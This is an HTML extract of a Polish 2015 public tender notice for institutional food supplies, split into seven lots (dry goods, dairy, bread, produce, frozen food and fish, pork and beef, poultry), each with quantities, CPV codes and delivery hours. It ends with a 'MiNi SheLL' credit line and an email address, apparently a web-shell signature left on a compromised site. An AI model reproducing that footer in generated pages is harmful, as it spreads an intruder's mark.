<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> ARTYKUŁY SPOŻYWCZE SUCHE, PRZYPRAWOWE I PRZETWORY OWOCOWO-WARZYWNE, PRODUKTY GARMAŻERYJNE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %	Wartość netto  
	 Wartość brutto


1	2	3	4	5	6	7	8	9

1	Cukier kryształ biały 1kg	kg	260					
2	Soki 430 ml	szt.	100					
3	Dżem owocowy niskosłodzony słoik o zawartości nie mniej niż 40% 280g	szt.	240					
4	Groch łupany  400 g 	kg	50					
5	Groszek konserwowy puszka 400g	szt.	30					
6	Ogórek konserwowy w słoiku 870 ml	szt.	210					
7	Aromat waniliowy 10 ml.	szt.	20					
8	Cukier puder 0,4 kg	szt.
	50
					
9.	Jajka kurze kl. A	szt.	7000					
10.	Koncentrat pomidorowy 30% 215 g	szt.	220					
11.	Kasza jęczmienna średnia  1kg	kg	27					
12.	Barszcz czerwony w proszku  Winiary 60 g             	kg	150					
13.	Proszek do pieczenia 30g	szt.	20					
14.	Zupa grzybowa 48 g	szt.	100					
15.	Cynamon 27g	szt.	20					
16.	Cukier waniliowy 32 g	szt.	35					
17.	Chrzan 290 g	szt.	25					
18.	Mąka pszenna 1kg	kg	450					
19.	Majeranek 10 g	szt.	20					
20.	Przyprawa do zup płynna 200 g	L	200					
21.	Majonez 600 g	szt.	45					
22.	Olej spożywczy rzepakowy 1 l.
                                                 
                                          	szt.
	350					
23.	Pieprz czarny mielony 20g-25g	szt.	80					
24.	Ryż biały  1kg	kg	125					
25.	Sól jodowana biała 1kg	kg	120					
26.	Sos do spaghetti torebka 45-51 g	szt. 	60					
27.	Zupa barszcz biały Winiary 42-66 g	szt. 	50					
28.	Barszcz biały butelka 0,4l	szt.	150					
29.	Fasola Jaś średnia 1 kg	kg	130					
30.	Kostki rosołowe drobiowe 180g	szt. 	20					
31.	Kwasek cytrynowy 20g	szt.	40					
32.	Przyprawa wieloskładnikowa warzywna sypka do potraw 200g	szt.	180					
33.	Kasza manna 1 kg	kg	90					
34.	Mąka ziemniaczana1 kg	kg	10					
35.	Żurek w torebce Winiary 49 g	szt. 	70					
36.	Kisiel Winiary 77 g	szt.	200					
37.	Zupa pieczarkowa Delekta 50 g 	szt. 	100					
38.	Sos ciemny pieczeniowy Winiary 30 g	kg	180					
39.	Makaron kolanko z falbanką 1 kg
	szt.	90					
40.	Makaron spaghetti  0,4 kg	szt.	280					
41.	Makaron świderki 1kg	kg	270					
42.	Wafelki Grześki 36 g	szt.	2700					
43.	Czekolada Wedel lub równoważne 100 g	szt.	1900					
44.	Makaron rurka Lubella 0,4 kg	szt.	120	
				
45.	Makaron do rosołu Czaniec 0,5 kg	szt.	85	
				
46.	Makaron muszelki Lubella 400 g	szt.	160					
47.	Makaron zacierka Goliard 0,25 kg	szt. 	160	
				
48.	Sos do sałatek różne smaki Knorr 9 g	szt.	100	
				
49.	Rodzynki 100 g	szt. 	25	
				
50.	Sos do potraw chińskich Łowicz  520 g	szt.	60	
				
51.	Sos do spaghetti Łowicz - 520 g	szt. 	100	
				
52.	Pieprz ziarnisty 20 g	szt. 	20	
				
53.	Delikat do mięs Knorr 200 g	szt.	60		
			
54.	Przyprawa Złocisty kurczak 40 g	szt.	40		
			
55.	Koncentrat buraczany Pińczów 330 ml	szt. 	50		
			
56.	Kasz jęczmienna gruba 1 kg	kg	100		
			
57.	Czosnek granulowany     20 g	szt.	30		
			
58.	Fasola Jaś drobny 1 kg	szt.	40		
			
59.	Marmolada wieloowocowa 0,55 kg	szt.	6			
		
60.	Pierogi z serem 0,45 kg	kg 	150			
		
61.	Pierogi z mięsem 0,45 kg	kg	110			
		
62.	Pierożki delikatesowe (uszka) 0,3 kg	kg	60			
		
63.	Pierogi z kapustą i mięsem 0,45 kg	kg	150			
		
64.	Kopytka 0,45 kg	kg	180			
		
66.	Kluski leniwe 0,45 kg	kg	120					
67.	Wafelki Góralki 50 g	szt.	300					
68.	Wafelki Princessa 35 g (49 g)	szt.	300					
69.	Koncentrat szczawiowy Łowicz  330 g	szt.	50					
70.	Sos słodko-kwaśny Łowicz 520 g	szt.	15					
71.	Płatki kukurydziane Lubella 500 g	kg	4					
72.	Ziele angielskie Interjarek 15 g	szt.	5					
73.	Galaretka (różne smaki) Delecta  75 g	szt.	80					
74.	Budyń - różne smaki Delecta 64 g	szt.	80					
75.	Liść laurowy Interjarek 8 g	szt. 	4					
76.	Sos myśliwski Winiary 30 g	sł.	30			
		
77.	Makaron łazanki Lubella 500 g	kg	20					


Zadanie 1  (artykuły spożywcze suche, przyprawowe i przetwory owocowo-warzywne) 
- 3 razy w tygodniu od godz. 7.00 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> NABIAŁ.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto



1	2	3	4	5	6	7	8	9

1.	Masło śmietankowe o zawartości nie mniej niż 67% 250g	szt.	40					
2.	Mleko 2% 1L	L	650					
3.	Śmietana 12% 400g Hej	l	1350					
4.	Serek topiony o zawartości tłuszczu nie mniej niż 25% Hochland 100g	kg	50					
5.	Twaróg biały półtłusty Czrnocin  1 kg	kg	180					
6.	Ser żółty pełnotłusty Gouda  1kg lub równoważny	kg	70					
7.	Serek Bakoma lub Bakuś 90 g	szt.	1400					
8.	Serek Danone lub równoważny 140 g	szt.	2000					
9.	Kefir 400 ml	szt.	160					
10.	Margaryna Kasia 250 g	szt.	130					
11.	Serek homogenizowany Kaśka  120 g	szt.	1100					
12.	Jogurt Ale owoc 150 g	szt.	2000		
			
13.	Jogurt Fantazja 122 g	szt.	1400		
			
14.	Deser Satino Bakoma     170 g	szt.	1100		
			
15.	Jogurt naturalny Czarnocin 370 g	szt.	40					

Zadanie 2  ( nabiał ) -  codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PIECZYWO.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp. Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto


1	2	3	4	5	6	7	8	9

1.	Bułka zwykła 100g	szt. 	450					
2.	Bułka tarta 1kg	kg	140					
3.	Chleb krojony pszenno-żytni jasny 600g-900g	szt.	500					
4.	Drożdże 100 g	kg	30		
			
                           

Zadanie 3  ( pieczywo ) - codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> WARZYWA i OWOCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowanie	
Jednostka	
Ilość 	Cena  netto za jednostkę	Stawka VAT %	Wartość netto 	 Wartość brutto

1	2	3	4	5	6	7	8

1	Ziemniaki jadalne typu kulinarnego (irga,bryza)	kg	6000				
2	Kapusta biała świeża	kg	380				
3	Marchew korzeń	kg	620				
4	Cebula biała korzeń	kg	80				
5	Pieczarki gat I	kg	150				
6	Rzodkiewka	pęczek	50				
7	Ogórek  zielony świeży	kg	200				
8.	Buraki czerwone świeże	kg	400				
9.	Kapusta kwaszona	kg	380				
10.	Jabłka gat I	kg	1200				
11.	Kapusta pekińska świeża	kg	140				
12.	Fasola czerwona konserwowa 400 g	szt.	25				
13.	Seler korzeń	kg	250				
14.	Pomidory świeże	kg	45				
15.	Sałata zielona	szt.	380				
16.	Kapusta czerwona świeża	kg	120				
17.	Por 	szt.	250				
18.	Koper zielony świeży	pęczek	40				
19.	Pietruszka korzeń	kg	250				
20.	Kalafior 	szt	140				
21.	Banany 	kg	500				
22.	Papryka świeża czerwona	kg	15				
23.	Ogórek kiszony	kg	350				
24. 	Mandarynki 	kg	400				
25. 	Pomarańcza 	kg	280				
26.	Kukurydza konserwowa 400 g	szt. 	45				
27.	Nektarynki	kg	100			
28.	Gruszki	kg	120			
29.	Czosnek główka	szt.	10				
30.	Natka pietruszki	pęczek	15				
 	 	 	 	 
Zadanie 4  ( warzywa i owoce ) - codziennie od godz.6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.10.00-6, 03.22.21.10-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> MROŻONKI i RYBY.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Proponowana gramatura	Cena netto za jednostkę 	Stawka VAT %	Wartość netto 
	 Wartość brutto

1	2	3	4	5	6	7	8	9

1.	Fasolka szparagowa 450g	szt.	75					
2.	Kalafior  450 g	szt.	120					
3.	Mieszanka jarzynowa 8-składnikowa 450g	szt.	160					
4.	Marchew mrożona mini 450 g	szt.	100					
5.	Mieszanka kompotowa o,45 kg	szt.	250					
6.	Ryby(filet bez ości, bez glazury, bez skóry-morszczuk)kg	kg	100					
7.	Brokuły 450 g	szt.	65					
8.	Brukselka 450 g	szt.	60					
9.	Truskawka mrożona o,45 kg	szt.	150					
10.	Wiśnie mrożone 0,5 kg	szt. 	100					
11.	Filet z miruny z/s	kg	150		
12.	Barszcz ukraiński 450 g	szt.	100		
13.	Mieszanka chińska 450 g	szt.	35		
14.	Marchew mrożona kostka 45o g	szt.	25		
15.	Frytki 2,5 kg	szt.	160		
	
Zadanie 5  ( mrożonki i ryby ) - 2 razy w tygodniu od godz. 6.30 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.33.11.70-9, 15.89.60.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> MIĘSO, PRZETWORY WIEPRZOWO-WOŁOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Cena netto za jednostkę	VAT %	Wartość netto 
	 Wartość brutto
1	2	3	4	5	6	7	8
1	Boczek wędzony nieparzony	kg	30				
2	Kiełbasa wiejska* cienka o zawartości mięsa nie mniej niż 60%	kg	250				
3	Karczek b/k wieprzowy	kg	600				
4	Żeberka 	kg	240				
5	Mortadela	kg	170				
6	Mięso mielone	kg	420				
7	Antrykot	kg	30				
8.	Smalec	kg	80				
9.	Słonina surowa bez skóry	kg	10				
10.	Boczek surowy	kg	30	
11.	Schab z/k wieprzowy	kg	650				
12.	Golonka	kg	25				
13.	Wołowina b/k	kg	180				
*produkty z wykluczeniem mięsa mechanicznie odkostnionego.
               
  Zadanie  6 ( mięso, przetwory wieprzowo- wołowe i drobiowe )
 -  codziennie od godz. 7.00 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> MIĘSO DROBIOWE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	
Nazwa artykułu i gramatura opakowania	
Jednostka	
Ilość 	Cena  netto za jednostkę	 VAT %	Wartość netto 
	 Wartość brutto
1	2	3	4	5	6	7	8
1.	Filet z kurczaka surowy	kg	260				
2.	Kurczak	kg	200				
3.	Porcja rosołowa  kurczaka ze skrzydłem	kg	30				
4.	Udziec z kurczaka	kg	480				
5.	Porcja rosołowa b/skrz.	kg	180				
6.	Wątróbka drobiowa	kg	150				
7.	Mięso mielone drobiowe	kg	50				
Zadanie 7 ( mięso drobiowe )  -  1 raz w tygodniu od godz. 7.00 do godz. 7.30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.11.20.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com